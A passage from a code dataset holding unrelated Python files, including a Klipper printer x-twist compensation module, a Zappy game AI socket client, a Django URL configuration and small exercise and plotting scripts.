\")\n\n print(problem_data[\"problem\"])\n\n return render_template(\"main/quest_show.html\", problem_data=problem_data)","repo_name":"0BackFlash0/Web-Project","sub_path":"WebPage/project/web/views/quest_views.py","file_name":"quest_views.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11352653103","text":"#HollowInvertedFullPyramid_2\n\nrows_n = int(input())\n\nfor i in range(1,rows_n+1):\n \n left_spaces = \" \"*(i-1)\n if i == 1:\n first_row =\"\"\n for f in range(1,rows_n+1):\n first_row =first_row+str(f)+\" \"\n print(left_spaces+first_row)\n elif i == rows_n:\n last_row = rows_n+1-i\n print(left_spaces+str(last_row))\n else:\n hollow_spaces = \" \"*(rows_n-i-1)\n start_range =1 \n end_range = rows_n+2-i\n for m in range(start_range,end_range):\n f_char = str(start_range)+\" \"\n l_char = str(m)\n middle_lines = left_spaces+f_char+hollow_spaces+l_char\n print(middle_lines)","repo_name":"veeru78866/ccbpCodes","sub_path":"ccbp_codes/codingPractice_14/HollowInvertedFullPyramid_2.py","file_name":"HollowInvertedFullPyramid_2.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"21596046590","text":"#!/usr/bin/python\n\nimport csv\nimport pylab\n\nfrom toolbox import stats\n\n\ndef ReadAndAvgDoublingTimes(filename):\n d = {}\n f = open(filename)\n for row in csv.reader(f):\n key = row[0]\n doubling_time = float(row[-1])\n d.setdefault(key, []).append(doubling_time)\n \n out = {}\n for key, dts in d.iteritems():\n out[key] = stats.MeanWithConfidenceInterval(dts)\n \n return out\n\n\ndts1 = ReadAndAvgDoublingTimes('/home/flamholz/Desktop/DoublingEst_WT.txt')\ndts2 = ReadAndAvgDoublingTimes('/home/flamholz/Desktop/DoublingEst_Adapted.txt')\n\n\nkeys = sorted(dts1.keys())\nvals1 = [dts1[k][0] for k in keys]\nvals2 = [dts2[k][0] for k in keys]\nerrs1 = [dts1[k][1] for k in keys]\nerrs2 = [dts2[k][1] for k in keys]\n\npylab.figure()\npylab.xlabel('WT Doubling Time')\npylab.ylabel('Adapted Doubling Time')\npylab.errorbar(vals1, vals2, yerr=errs2, xerr=errs1, fmt='g.', ecolor='b')\n#pylab.errorbar(x, y, yerr, xerr, fmt, ecolor, elinewidth, capsize, barsabove, lolims, uplims, xlolims, xuplims, hold)\nfor i, k in enumerate(keys):\n pylab.text(vals1[i], vals2[i], k)\n\npylab.show()\n\n \n\n","repo_name":"eladnoor/milo-lab","sub_path":"src/scripts/compare_robosite_doubling_times.py","file_name":"compare_robosite_doubling_times.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"4440149342","text":"import logging\nimport math\nfrom . import manual_probe as ManualProbe, bed_mesh as BedMesh\n\nDEFAULT_N_POINTS = 3\nDEFAULT_PROFILE_NAME = 'default'\nBED_MESH_CONFIG_NAME = 'bed_mesh'\n\n\nclass Config:\n # values stored in printer.cfg when a profile is saved\n DEFAULT_SPEED = 50.\n DEFAULT_HORIZONTAL_MOVE_Z = 10.\n REQUIRED = True\n OPTIONAL = False\n CONFIG_OPTIONS = {\n 'horizontal_move_z': (float, OPTIONAL, DEFAULT_HORIZONTAL_MOVE_Z),\n 'speed': (float, OPTIONAL, DEFAULT_SPEED),\n 'start_x': (float, REQUIRED, None),\n 'end_x': (float, REQUIRED, None),\n 'y': (float, REQUIRED, None)\n }\n\n\nclass XTwistCompensation:\n def __init__(self, config):\n # get printer\n self.printer = config.get_printer()\n\n # get values from [x_twist_compensation] section in printer .cfg\n for config_key, \\\n (config_type, required, default) in Config.CONFIG_OPTIONS.items():\n value = None\n if config_type == float:\n value = config.getfloat(config_key, default)\n else:\n value = config.get(config_key, default)\n if required and value is None:\n raise config.error(\n \"Missing required config option for section [{}]: {}\"\n .format(config.get_name(), config_key))\n setattr(self, config_key, value)\n\n # setup persistent storage\n self.pmgr = ProfileManager(config, self)\n\n # setup calibrater\n calibrater_config = {\n 'horizontal_move_z': self.horizontal_move_z\n if hasattr(self, 'horizontal_move_z') else None,\n 'speed': self.speed if hasattr(self, 'speed') else None,\n 'start_x': self.start_x if hasattr(self, 'start_x') else None,\n 'end_x': self.end_x if hasattr(self, 'end_x') else None,\n 'y': self.y if hasattr(self, 'y') else None\n }\n self.calibrater = Calibrater(\n config, self.pmgr, calibrater_config)\n\n self.enabled = False\n\n # register gcode handlers\n self._register_gcode_handlers()\n\n def _register_gcode_handlers(self):\n # register gcode handlers\n self.gcode = self.printer.lookup_object('gcode')\n self.gcode.register_command(\n 'X_TWIST_COMPENSATE_MESH',\n self.cmd_X_TWIST_COMPENSATE_MESH,\n desc=self.cmd_X_TWIST_COMPENSATE_MESH_help)\n self.gcode.register_command(\n 'X_TWIST_COMPENSATE_STATUS',\n self.cmd_X_TWIST_COMPENSATE_STATUS,\n desc=self.cmd_X_TWIST_COMPENSATE_STATUS_help)\n\n def get_z_compensation_value(self, x_coord, optional_profile_name=None):\n # returns the (lineraly interpolated) z compensation value\n # for the given x coordinate\n # uses the current profile if optional_profile_name is not specified\n enabled = self.pmgr.get_is_enabled()\n if enabled or optional_profile_name is not None:\n current_profile = \\\n self.pmgr.get_current_profile() \\\n if optional_profile_name is None \\\n else self.pmgr.get_profile(optional_profile_name)\n z_compensations = current_profile.z_compensations\n n_points = len(z_compensations)\n spacing = (self.end_x - self.start_x) / (n_points - 1)\n interpolate_t = (x_coord - self.start_x) / spacing\n interpolate_i = int(math.floor(interpolate_t))\n interpolate_i = BedMesh.constrain(interpolate_i, 0, n_points - 2)\n interpolate_t -= interpolate_i\n interpolated_z_compensation = BedMesh.lerp(\n interpolate_t, z_compensations[interpolate_i],\n z_compensations[interpolate_i + 1])\n return interpolated_z_compensation\n else:\n return 0\n\n cmd_X_TWIST_COMPENSATE_MESH_help = \\\n \"Compensate a mesh by applying the x\" \\\n \"twist compensation to the given raw mesh\"\n\n def cmd_X_TWIST_COMPENSATE_MESH(self, gcmd):\n # get the mesh name from the gcode command\n raw_mesh_name = gcmd.get('MESH_NAME', None)\n Helpers.check_non_empty_param(raw_mesh_name, gcmd, 'MESH_NAME')\n\n # get the compensation profile name from the gcode command\n compensation_name = gcmd.get('COMPENSATION_NAME', None)\n Helpers.check_non_empty_param(\n compensation_name, gcmd, 'COMPENSATION_NAME')\n\n # get the bed_mesh object, then the bed_mesh profile manager\n bed_mesh = self.printer.lookup_object('bed_mesh', None)\n if not bed_mesh:\n raise gcmd.error(\n \"[bed_mesh] is not specified in your printer configuration\")\n bed_mesh_pmgr = bed_mesh.pmgr\n # load specified bed mesh as active bed mesh\n bed_mesh_pmgr.load_profile(raw_mesh_name)\n # get the active bed mesh\n active_bed_mesh = bed_mesh.get_mesh()\n # modify the probed matrix by applying the x twist compensation\n #modified_probed_matrix = self._modify_probed_matrix(\n # active_bed_mesh, compensation_name)\n\n enabled = self.pmgr.get_is_enabled()\n if enabled or compensation_name is not None:\n current_profile = \\\n self.pmgr.get_current_profile() \\\n if compensation_name is None \\\n else self.pmgr.get_profile(compensation_name)\n z_compensations = current_profile.z_compensations\n modified_probed_matrix = self._modify_probed_matrix_XY(active_bed_mesh, z_compensations[0], z_compensations[1])\n\n # update active mesh with modified probed matrix, save under new name\n #compensated_mesh_name = \\\n # raw_mesh_name + '_compensated_' + compensation_name\n active_bed_mesh.build_mesh(modified_probed_matrix)\n #bed_mesh_pmgr.save_profile(compensated_mesh_name)\n bed_mesh_pmgr.save_profile(raw_mesh_name)\n\n def _modify_probed_matrix_XY(self, bed_mesh, xz, yz):\n \n probed_matrix = bed_mesh.get_probed_matrix()\n compensated_matrix = []\n row_count = len(probed_matrix) - 1\n yz_step = yz / row_count\n col_count = len(probed_matrix[0]) - 1\n xz_step = xz / col_count\n\n for row_index in range(len(probed_matrix)):\n compensated_row = []\n row = probed_matrix[row_index]\n for col_index in range(len(row)):\n z = row[col_index]\n compensated_z = z + (xz_step * col_index) + (yz_step * row_index)\n compensated_row.append(compensated_z)\n compensated_matrix.append(compensated_row)\n\n compensated_matrix = tuple(tuple(row) for row in compensated_matrix)\n return compensated_matrix\n\n def _modify_probed_matrix(self, bed_mesh, compensation_profile_name):\n # do compensating, by modifying z values in probed matrix\n # probed matrix is a list of rows of probed z values\n # eg. probed_matrix[0][0] = bottom left corner of mesh, z value\n probed_matrix = bed_mesh.get_probed_matrix()\n compensated_matrix = []\n for row_index in range(len(probed_matrix)):\n compensated_row = []\n row = probed_matrix[row_index]\n for col_index in range(len(row)):\n z = row[col_index]\n x_coord = self._get_mesh_point_x_coord(col_index, bed_mesh)\n compensated_z = z + \\\n self.get_z_compensation_value(\n x_coord, compensation_profile_name)\n compensated_row.append(compensated_z)\n compensated_matrix.append(compensated_row)\n # compensated_matrix is a list of list\n # bed_mesh expects tuple of tuple hence convert\n compensated_matrix = tuple(tuple(row) for row in compensated_matrix)\n return compensated_matrix\n\n def _get_mesh_point_x_coord(self, col_index, mesh):\n # returns the x coordinate of the given column index\n # in the probed matrix\n x_min = mesh.mesh_x_min\n x_range = mesh.mesh_x_max - mesh.mesh_x_min\n x_step = x_range / (len(mesh.probed_matrix[0]) - 1)\n return x_min + col_index * x_step\n\n cmd_X_TWIST_COMPENSATE_STATUS_help = \\\n \"Get the status of the x twist compensation\"\n\n def cmd_X_TWIST_COMPENSATE_STATUS(self, gcmd):\n if (self.pmgr.get_is_enabled()):\n profile = self.pmgr.get_current_profile()\n profile_name = profile.name\n profile_z_compensations = profile.z_compensations\n profile_recommended_z_offset = profile.recommended_z_offset\n gcmd.respond_info(\n \"\"\"\n X twist compensation is enabled\n Profile name: {}\n Profile z compensations: {}\n Profile recommended z offset: {}\n \"\"\".format(profile_name,\n profile_z_compensations, profile_recommended_z_offset))\n else:\n gcmd.respond_info(\n \"X twist compensation is disabled, \"\\\n \"load a profile using X_TWIST_PROFILE_LOAD\"\n )\n\n\nclass Calibrater:\n def __init__(self, config, pmgr, calibrater_config):\n # setup self attributes\n self.printer = config.get_printer()\n self.gcode = self.printer.lookup_object('gcode')\n self.pmgr = pmgr\n self.probe = None\n # probe settings are set to none, until they are available\n self.lift_speed, self.probe_x_offset, self.probe_y_offset, \\\n self.stored_probe_z_offset = None, None, None, None\n self.printer.register_event_handler(\"klippy:connect\",\n self._handle_connect(config))\n self.speed = calibrater_config['speed']\n self.horizontal_move_z = calibrater_config['horizontal_move_z']\n self.start_point = (\n calibrater_config['start_x'], calibrater_config['y'])\n self.end_point = (calibrater_config['end_x'], calibrater_config['y'])\n self.results = []\n self.current_point_index = None\n self.gcmd = None\n\n # register gcode handlers\n self._register_gcode_handlers()\n\n def _handle_connect(self, config):\n # gets probe settings when they are available\n def callback():\n self.probe = self.printer.lookup_object('probe', None)\n if (self.probe is None):\n raise config.error(\n \"X_TWIST_COMPENSATION requires [probe] to be defined\")\n self.lift_speed = self.probe.get_lift_speed()\n self.probe_x_offset, self.probe_y_offset, \\\n self.stored_probe_z_offset = self.probe.get_offsets()\n return callback\n\n def _register_gcode_handlers(self):\n # register gcode handlers\n self.gcode = self.printer.lookup_object('gcode')\n self.gcode.register_command(\n 'X_TWIST_CALIBRATE', self.cmd_X_TWIST_CALIBRATE,\n desc=self.cmd_X_TWIST_CALIBRATE_help)\n\n cmd_X_TWIST_CALIBRATE_help = \"\"\"\n Performs the x twist calibration wizard\n Measure z probe offset at n points along the x axis,\n and calculate x twist compensation\n Specify PROFILE_NAME= - optional, default is 'default'\n \"\"\"\n\n def cmd_X_TWIST_CALIBRATE(self, gcmd):\n self.gcmd = gcmd\n # performs the x twist calibration wizard\n # get params from command\n profile_name = gcmd.get('PROFILE_NAME', DEFAULT_PROFILE_NAME)\n n_points = gcmd.get_int('N_POINTS', DEFAULT_N_POINTS)\n\n # check for valid profile_name\n Helpers.check_non_empty_param(profile_name, self.gcmd, 'PROFILE_NAME')\n # check for valid n_points\n if n_points is None or n_points < 3:\n raise self.gcmd.error(\n \"N_POINTS to probe must be at least 3\")\n\n # clear the current profile\n self.pmgr.clear_profile()\n\n # calculate some values\n x_range = self.end_point[0] - self.start_point[0]\n interval_dist = x_range / (n_points - 1)\n nozzle_points = self._calculate_nozzle_points(n_points, interval_dist)\n probe_points = self._calculate_probe_points(\n nozzle_points, self.probe_x_offset, self.probe_y_offset)\n\n # verify no other manual probe is in progress\n ManualProbe.verify_no_manual_probe(self.printer)\n\n # begin calibration\n self.current_point_index = 0\n self._calibration(\n profile_name, probe_points, nozzle_points, interval_dist)\n\n def _calculate_nozzle_points(self, n_points, interval_dist):\n # calculate the points to put the probe at, returned as a list of tuples\n nozzle_points = []\n for i in range(n_points):\n x = self.start_point[0] + i * interval_dist\n y = self.start_point[1]\n nozzle_points.append((x, y))\n return nozzle_points\n\n def _calculate_probe_points(self, nozzle_points,\n probe_x_offset, probe_y_offset):\n # calculate the points to put the nozzle at\n # returned as a list of tuples\n probe_points = []\n for point in nozzle_points:\n x = point[0] - probe_x_offset\n y = point[1] - probe_y_offset\n probe_points.append((x, y))\n return probe_points\n\n def _move_helper(self, target_coordinates, override_speed=None):\n # pad target coordinates\n target_coordinates = \\\n (target_coordinates[0], target_coordinates[1], None) \\\n if len(target_coordinates) == 2 else target_coordinates\n toolhead = self.printer.lookup_object('toolhead')\n speed = self.speed if target_coordinates[2] == None else self.lift_speed\n speed = override_speed if override_speed is not None else speed\n toolhead.manual_move(target_coordinates, speed)\n\n def _calibration(self, profile_name, probe_points, nozzle_points, interval):\n # begin the calibration process\n self.gcmd.respond_info(\"X_TWIST_CALIBRATE: Probing point %d of %d\" % (\n self.current_point_index + 1, len(probe_points)))\n\n # horizontal_move_z (to prevent probe trigger or hitting bed)\n self._move_helper((None, None, self.horizontal_move_z))\n\n # move to point to probe\n self._move_helper((probe_points[self.current_point_index]\n [0], probe_points[self.current_point_index][1], None))\n\n # probe the point\n self.probe.run_probe(self.gcmd)\n\n # horizontal_move_z (to prevent probe trigger or hitting bed)\n self._move_helper((None, None, self.horizontal_move_z))\n\n # move the nozzle over the probe point\n self._move_helper((nozzle_points[self.current_point_index]))\n\n # start the manual (nozzle) probe\n ManualProbe.ManualProbeHelper(\n self.printer, self.gcmd,\n self._manual_probe_callback_factory(profile_name,\n probe_points, nozzle_points, interval))\n\n def _manual_probe_callback_factory(self, profile_name, probe_points,\n nozzle_points, interval):\n # returns a callback function for the manual probe\n is_end = self.current_point_index == len(probe_points) - 1\n\n def callback(kin_pos):\n if kin_pos is None:\n # probe was cancelled\n self.gcmd.respond_info(\n \"X_TWIST_CALIBRATE: Probe cancelled, calibration aborted\")\n return\n z_offset = self.stored_probe_z_offset - kin_pos[2]\n self.results.append(z_offset)\n if is_end:\n # end of calibration\n self._finalize_calibration(profile_name)\n else:\n # move to next point\n self.current_point_index += 1\n self._calibration(\n profile_name, probe_points, nozzle_points, interval)\n return callback\n\n def _finalize_calibration(self, profile_name):\n # finalize the calibration process\n # calculate average of results\n avg = sum(self.results) / len(self.results)\n # subtract average from each result\n # so that they are independent of z_offset\n self.results = [avg - x for x in self.results]\n # create a new profile using profile manager\n self.pmgr.create_profile(profile_name, self.results, avg)\n # recommend z offset to user\n self.gcmd.respond_info(\n \"X_TWIST_CALIBRATE: Calibration complete, reccomended z_offset: %f\"\n % (avg))\n\n\nclass Profile:\n PROFILE_OPTIONS = {\n 'z_compensations': str, 'recommended_z_offset': float\n }\n\n def __init__(self, name, z_compensations, recommended_z_offset):\n self.name = name\n self.z_compensations = z_compensations\n self.recommended_z_offset = recommended_z_offset\n\n\nclass ProfileManager:\n def __init__(self, config, x_twist_compensation):\n # setup self attributes\n self.name = config.get_name()\n self.printer = config.get_printer()\n self.x_twist_compensation = x_twist_compensation\n self.profiles = {}\n self.gcode = self.printer.lookup_object('gcode')\n self.current_profile = None\n\n # fetch the stored profiles\n self._fetch_stored_profiles(config)\n logging.info('stored profiles: %s', self.profiles)\n\n # register gcode handlers\n self._register_gcode_handlers()\n\n def get_is_enabled(self):\n # returns\n return self.current_profile is not None\n\n def get_current_profile(self):\n # return the current profile\n if self.current_profile is None:\n raise self.gcode.error(\n \"No X_TWIST_PROFILE loaded\")\n return self.current_profile\n\n def get_profiles(self):\n # dictionary of profiles loaded from printer.cfg, key is profile name\n return self.profiles\n\n def get_profile(self, profile_name):\n # attempt to get profile from self.profiles\n # throws error if profile does not exist or is corrupt\n logging.info('attempting to get profile name %s', profile_name)\n logging.info('available profiles: %s', self.profiles)\n profile = self.profiles.get(profile_name, None)\n if profile is None:\n raise self.gcode.error(\n \"X_TWIST_PROFILE %s does not exist\" % (profile_name))\n z_compensations = profile.get('z_compensations', None)\n if z_compensations is None:\n raise self.gcode.error(\n \"X_TWIST_PROFILE %s does not have z_compensations\"\n % (profile_name))\n recommended_z_offset = profile.get('recommended_z_offset', None)\n if recommended_z_offset is None:\n raise self.gcode.error(\n \"X_TWIST_PROFILE %s does not have recommended_z_offset\"\n % (profile_name))\n return Profile(profile_name, z_compensations, recommended_z_offset)\n\n def _fetch_stored_profiles(self, config):\n # fetch stored profiles in printer.cfg\n # (using prefix of \"x_twist_compensation\"\")\n stored_profiles = config.get_prefix_sections(self.name)\n stored_profiles = [\n stored_profile for stored_profile in stored_profiles\n if stored_profile.get_name() != self.name\n ]\n # add stored profiles to self.profiles\n for stored_profile in stored_profiles:\n prefixed_name = stored_profile.get_name()\n # remove prefix from name\n name = prefixed_name.split(' ', 1)[1]\n self.profiles[name] = {}\n for option, option_type in Profile.PROFILE_OPTIONS.items():\n if option_type == float:\n self.profiles[name][option] = stored_profile.getfloat(\n option)\n elif option_type == str:\n value = stored_profile.get(option)\n if option == 'z_compensations':\n self.profiles[name][option] = \\\n Helpers.parse_comma_separated_floats(value)\n else:\n self.profiles[name][option] = stored_profile.get(\n option)\n\n def _register_gcode_handlers(self):\n # register gcode handlers\n self.gcode.register_command(\n 'X_TWIST_PROFILE', self.cmd_X_TWIST_PROFILE,\n desc=self.cmd_X_TWIST_PROFILE_help)\n self.gcode.register_command(\n 'X_TWIST_PROFILE_LOAD', self.cmd_X_TWIST_PROFILE_LOAD,\n desc=self.cmd_X_TWIST_PROFILE_LOAD_help)\n self.gcode.register_command(\n 'X_TWIST_PROFILE_SAVE', self.cmd_X_TWIST_PROFILE_SAVE,\n desc=self.cmd_X_TWIST_PROFILE_SAVE_help)\n self.gcode.register_command(\n 'X_TWIST_PROFILE_DELETE', self.cmd_X_TWIST_PROFILE_DELETE,\n desc=self.cmd_X_TWIST_PROFILE_DELETE_help)\n self.gcode.register_command(\n 'X_TWIST_PROFILE_CLEAR', self.cmd_X_TWIST_PROFILE_CLEAR,\n desc=self.cmd_X_TWIST_PROFILE_CLEAR_help)\n\n def create_profile(self, profile_name, z_compensations,\n recommended_z_offset):\n # create a new profile\n new_profile = Profile(\n profile_name, z_compensations, recommended_z_offset)\n # save the profile\n self._save_profile(new_profile)\n\n def load_profile(self, profile_name):\n # set the current profile\n self.current_profile = self.get_profile(profile_name)\n\n def clear_profile(self):\n # clear the current profile\n self.current_profile = None\n\n def delete_profile(self, profile_name):\n # try getting the profile to ensure it exists\n self.get_profile(profile_name)\n # remove the profile from config file\n configfile = self.printer.lookup_object('configfile')\n configfile.remove_section('%s %s' % (self.name, profile_name))\n # remove the profile from self.profiles\n profiles = dict(self.profiles)\n del profiles[profile_name]\n self.profiles = profiles\n # inform user to save deletion\n self.gcode.respond_info(\n \"Profile [%s] removed from storage for this session.\\n\"\n \"The SAVE_CONFIG command will update the printer\\n\"\n \"configuration and restart the printer\" % (profile_name))\n\n def _save_profile(self, profile):\n profile_name = profile.name\n config_name = '%s %s' % (self.name, profile_name)\n configfile = self.printer.lookup_object('configfile')\n # save the profile to config file\n # also save to self.profiles, make sure immutable by making a copy\n profiles = dict(self.profiles)\n profiles[profile_name] = new_profile = {}\n for option, option_type in Profile.PROFILE_OPTIONS.items():\n value = getattr(profile, option)\n if option_type == float:\n value = float(value)\n new_profile[option] = value # save to self.profiles\n configfile.set(config_name, option,\n Helpers.format_float_to_n_decimals(value))\n elif option_type == str:\n if option == 'z_compensations':\n # convert to list of floats\n value = [float(x) for x in value]\n new_profile[option] = value # save to self.profiles\n value_as_str = [Helpers.format_float_to_n_decimals(\n x) for x in value] # convert to list of strs\n configfile.set(config_name, option, ', '.join(\n value_as_str)) # store as comma separated\n else:\n new_profile[option] = value # save to self.profiles\n configfile.set(config_name, option, value)\n # inform user to save changes\n self.gcode.respond_info(\n \"X_TWIST_COMPENSATION state has been saved to profile [%s]\\n\"\n \"for the current session. The SAVE_CONFIG command will\\n\"\n \"update the printer config file and restart the printer.\"\n % (profile_name))\n\n def save_current_profile(self, profile_name):\n # get the current profile\n profile = self.get_current_profile()\n # set the name\n profile.name = profile_name\n # save the profile\n self._save_profile(profile)\n\n cmd_X_TWIST_PROFILE_LOAD_help = \\\n \"Loads a saved mesh as the active mesh\"\n\n def cmd_X_TWIST_PROFILE_LOAD(self, gcmd):\n # loads a saved mesh as the active mesh\n profile_name = gcmd.get('NAME', None)\n Helpers.check_non_empty_param(profile_name, gcmd, 'NAME')\n self.load_profile(profile_name)\n\n cmd_X_TWIST_PROFILE_CLEAR_help = \\\n \"Clears the active mesh\"\n\n def cmd_X_TWIST_PROFILE_CLEAR(self, gcmd):\n # clears the active mesh\n self.clear_profile()\n\n cmd_X_TWIST_PROFILE_SAVE_help = \\\n \"Saves the active mesh to the config file\"\n\n def cmd_X_TWIST_PROFILE_SAVE(self, gcmd):\n # saves the active mesh to the config file\n profile_name = gcmd.get('NAME', None)\n Helpers.check_non_empty_param(profile_name, gcmd, 'NAME')\n self.save_current_profile(profile_name)\n\n cmd_X_TWIST_PROFILE_DELETE_help = \\\n \"Deletes a saved profile from the config file\"\n\n def cmd_X_TWIST_PROFILE_DELETE(self, gcmd):\n # deletes a saved mesh from the config file\n profile_name = gcmd.get('NAME', None)\n Helpers.check_non_empty_param(profile_name, gcmd, 'NAME')\n self.delete_profile(profile_name)\n\n cmd_X_TWIST_PROFILE_help = \\\n \"Prints information on how to use the X_TWIST_PROFILE command\"\n\n def cmd_X_TWIST_PROFILE(self, gcmd):\n raise self.gcode.error(\n \"\"\"\n Please follow the following syntax:\n X_TWIST_PROFILE_LOAD NAME=\n X_TWIST_PROFILE_SAVE NAME=\n X_TWIST_PROFILE_DELETE NAME=\n X_TWIST_PROFILE_CLEAR\n \"\"\"\n )\n\n\nclass Helpers:\n @staticmethod\n def format_float_to_n_decimals(raw_float, n=6):\n # format float to n decimals, defaults to 6\n return \"{:.{}f}\".format(raw_float, n)\n\n @staticmethod\n def parse_comma_separated_floats(comma_separated_floats):\n # parse comma separated floats into list of floats\n return [float(value) for value in comma_separated_floats.split(', ')]\n\n @staticmethod\n def check_non_empty_param(param_str, gcmd, param_name=None):\n # throws gcmd error if parameter is None or just spaces\n if param_str is None or not param_str.strip():\n error = \"Parameter [%s] is required\" % (\n param_name) if param_name else \"Parameter is required\"\n raise gcmd.error(error)\n\n# klipper's entry point using [x_twist_compensation] section in printer.cfg\n\n\ndef load_config(config):\n return XTwistCompensation(config)","repo_name":"QIDITECH/klipper","sub_path":"klippy/extras/x_twist_compensation.py","file_name":"x_twist_compensation.py","file_ext":"py","file_size_in_byte":26963,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"3602800859","text":"from LoginModule import views, validateDataForRegister, validateDataForLogin\r\nfrom django.urls.conf import path\r\n\r\nurlpatterns = [\r\n path('', views.login, name=\"login\"),\r\n path('register', views.register, name=\"login\"),\r\n path('validateDataForRegister', validateDataForRegister.userNameForm, name=\"userNameForm\"),\r\n path('validateDataForLogin', validateDataForLogin.userNameForm, name=\"userNameForm\")\r\n\r\n]","repo_name":"Ocirederf94/CAH","sub_path":"LoginModule/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25459150387","text":"#!/usr/bin/env python3.4\n\nimport signal\nimport select\nimport sys\n\nfrom ModuleConnect import *\nfrom GetOptions import *\nfrom MessageClass import *\nfrom InterpretClass import *\nfrom CommandClass import *\nfrom IAClass import *\nfrom threading import Thread\n\n__author__ = \"Nicolas Charvoz\"\n__copyright__ = \"Copyright 2015, La Pintade\"\n__credits__ = [\"Nicolas Charvoz\", \"Louis Audibert\", \"Serge Heitzler\",\n \"Antoine Garcia\"]\n__license__ = \"GPL\"\n__versione__ = \"1.1.1\"\n__email__ = \"nicolas.charvoz@epitech.eu\"\n__status__ = \"Dev\"\n\np = GetOptions()\nmess = MessageClass()\nic = InterpretClass()\ncc = CommandClass()\ns = None\n\ndef send_name_to_server(s):\n if (p.getName()):\n var = p.getName()\n else:\n self.team = 'Team'\n self.team += str(random.randint(1,10))\n var += '\\r\\n'\n mess.sendMessage(s, var)\n\ndef protocol(s):\n rec = mess.readMessage(s)\n if (ic.interpret_bienvenue(s, rec, p) == 1):\n send_name_to_server(s)\n else:\n print('The server has not send the Bienvenue message')\n sys.exit(0)\n rec = mess.readMessage(s)\n if (ic.interpret_num_client(s, rec, p) == -1):\n print('Cannot connect to the server, too many teamate already connected')\n s.close()\n sys.exit(0)\n rec = mess.readMessage(s)\n ic.interpret_size(s, rec, p)\n var = 'OK'\n var += '\\r\\n'\n #mess.sendMessage(s, var)\n\ndef listenToServer(s):\n flag = False\n while not flag:\n data = mess.readMessage(s)\n if not data:\n print('Shutting down.')\n flag = True\n sys.exit(0)\n elif data == 'mort\\n':\n print('You died')\n flag = True\n sys.exit(0)\n else:\n sys.stdout.write('SERVER: ' + data + '\\n')\n sys.stdout.flush()\n\ndef main():\n try:\n p.parseOpt()\n if not p.getName():\n print('Exception : You need a name to start')\n sys.exit()\n mc = ModuleConnect()\n s = mc.connect(p.getHost(), p.getPort())\n protocol(s)\n flag = False\n while not flag:\n try:\n if not p.getDbg():\n ia = IAClass(s, p, mess)\n threadIA = ia.run()\n threadServer = listenToServer(s)\n threadIA.start()\n threadServer.start()\n threadIA.join()\n threadServer.join()\n else:\n sys.stdout.write('$> ')\n sys.stdout.flush()\n inputready, outputready, execptready = select.select([0, s], [], [])\n for i in inputready:\n if i == 0:\n data = sys.stdin.readline().strip()\n if data:\n data += '\\r\\n'\n mess.sendMessage(s, data)\n elif i == s:\n data = mess.readMessage(s)\n if not data:\n print('Shutting down.')\n flag = True\n break\n elif data == 'mort\\n':\n print('You died')\n flag = True\n break\n else:\n sys.stdout.write('SERVER: ' + data + '\\n')\n sys.stdout.flush()\n except KeyboardInterrupt:\n print('Interrupted.')\n s.close()\n break\n\n except ConnectionRefusedError:\n print('Exception : The server has refused the connection')\n #except getopt.GetoptError:\n print('Usage : client.py [-n [NAME]] [-h [HOST]] [-p [PORT]] [--dbg]')\n except ConnectionResetError:\n print('The server has shutdown')\n except BrokenPipeError:\n print('The server has hung up')\n# except TypeError:\n # print('Parsing error, cannot handle too much things ..')\n #except:\n # print('Exception : An error has occured')\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n # sys.stdout.write('$> ')\n # sys.stdout.flush()\n # inputready, outputready, execptready = select.select([0, s], [], [])\n # for i in inputready:\n # if i == 0:\n # data = sys.stdin.readline().strip()\n # if data:\n # act_command(s)\n # data += '\\r\\n'\n # #mess.sendMessage(s, data)\n # elif i == s:\n # data = mess.readMessage(s)\n # if not data:\n # print('Shutting down.')\n # flag = True\n # break\n # elif data == 'mort':\n # print('You died')\n # flag = True\n # break\n # else:\n # sys.stdout.write('SERVER: ' + data + '\\n')\n # sys.stdout.flush()\n","repo_name":"Hiruxou/Epitech-2","sub_path":"PSU_2014_zappy/sources/client/zappy_ai.py","file_name":"zappy_ai.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31664001298","text":"from data.globalConstants import *\r\n# Sgt. Slaughter\r\nname = 'Sgt. Slaughter'\r\n\r\n# General Card Definitions: \r\n# 1000 = OC\r\n# 1001 = OC/TT\r\n# 1002 = DC\r\nGeneralCard = [1002, 1002, 1001, 1002, 1000, 1000, 1000, 1002, 1002, 1002, 1000]\r\n\r\n# Offensive Card Definitions:\r\n# 1003 = Pin attempt move (P/A)\r\n# 1004 = Submission Move (*)\r\n# 1005 = Specialty Move (S)\r\n# 1006 = Disqualification Move (DQ)\r\n# 1008 = Regular Offensive Move\r\n# 1009 = Grudge Match Move (XX)\r\n# 1010 = Ropes Move (ROPES)\r\nOffensiveCard = \\\r\n[ {'MOVE_POINTS': 10, 'MOVE_TYPE': 1004, 'MOVE_NAME': 'FT. DIX SLEEPER'},\r\n {'MOVE_POINTS': 5, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'DROPKICK'},\r\n {'MOVE_POINTS': 9, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'BILOXI SUPLEX'},\r\n {'MOVE_POINTS': 8, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'MILITARY PILEDRIVER'},\r\n {'MOVE_POINTS': 7, 'MOVE_TYPE': 1009, 'MOVE_NAME': 'ARM DRAG'},\r\n {'MOVE_POINTS': 9, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'FOREARM TO FACE'},\r\n {'MOVE_POINTS': 8, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'ELBOW TO STERNUM'},\r\n {'MOVE_TYPE': 1005, 'MOVE_NAME': 'COMBAT CLUTCH'},\r\n {'MOVE_POINTS': 10, 'MOVE_TYPE': 1003, 'MOVE_NAME': 